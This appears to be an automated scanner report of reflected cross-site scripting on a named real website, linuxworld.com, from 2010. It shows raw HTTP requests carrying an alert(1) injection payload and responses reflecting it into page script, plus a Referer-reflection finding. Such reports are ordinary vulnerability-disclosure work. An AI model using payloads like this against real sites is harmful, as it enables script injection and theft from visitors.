1. Cross-site scripting (reflected)
1.1. http://www.linuxworld.com/ [name of an arbitrarily supplied request parameter]
1.2. http://www.linuxworld.com/ [Referer HTTP header]
Severity: | High |
Confidence: | Certain |
Host: | http://www.linuxworld.com |
Path: | / |
GET /?c4e86'-alert(1)- Host: www.linuxworld.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;) Connection: close |
HTTP/1.1 200 OK Date: Fri, 17 Dec 2010 00:34:07 GMT Server: Apache/2.2.3 (CentOS) Set-Cookie: Apache=204.51.113.169 Accept-Ranges: bytes Cache-Control: public, max-age=600 Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 210084 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <h ...[SNIP]... gtype: 'homepage', subtopic: '', freemium: 'n', nsdr_auth: 'no', subtopicid: 0, outerref: '(none)', nwchannel: 'Network World', request_uri: '/?c4e86'-alert(1)- doc_uri: '/index.html', site: 'home', rxid: '75931', nodeid: '' }; }(); var jq_nodeid = ""; var jq_request_uri = "/?c4e86'-alert(1)-'90 ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.linuxworld.com |
Path: | / |
GET / HTTP/1.1 Host: www.linuxworld.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;) Connection: close Referer: http://www.google.com |
HTTP/1.1 200 OK Date: Fri, 17 Dec 2010 00:35:03 GMT Server: Apache/2.2.3 (CentOS) Set-Cookie: Apache=204.51.113.169 Accept-Ranges: bytes Cache-Control: public, max-age=600 Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 210044 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <h ...[SNIP]... eneral', rxsubtopicname: '', pgtype: 'homepage', subtopic: '', freemium: 'n', nsdr_auth: 'no', subtopicid: 0, outerref: 'http://www.google.com nwchannel: 'Network World', request_uri: '/', doc_uri: '/index.html', site: 'home', rxid: '75931', nodeid: '' }; ...[SNIP]... |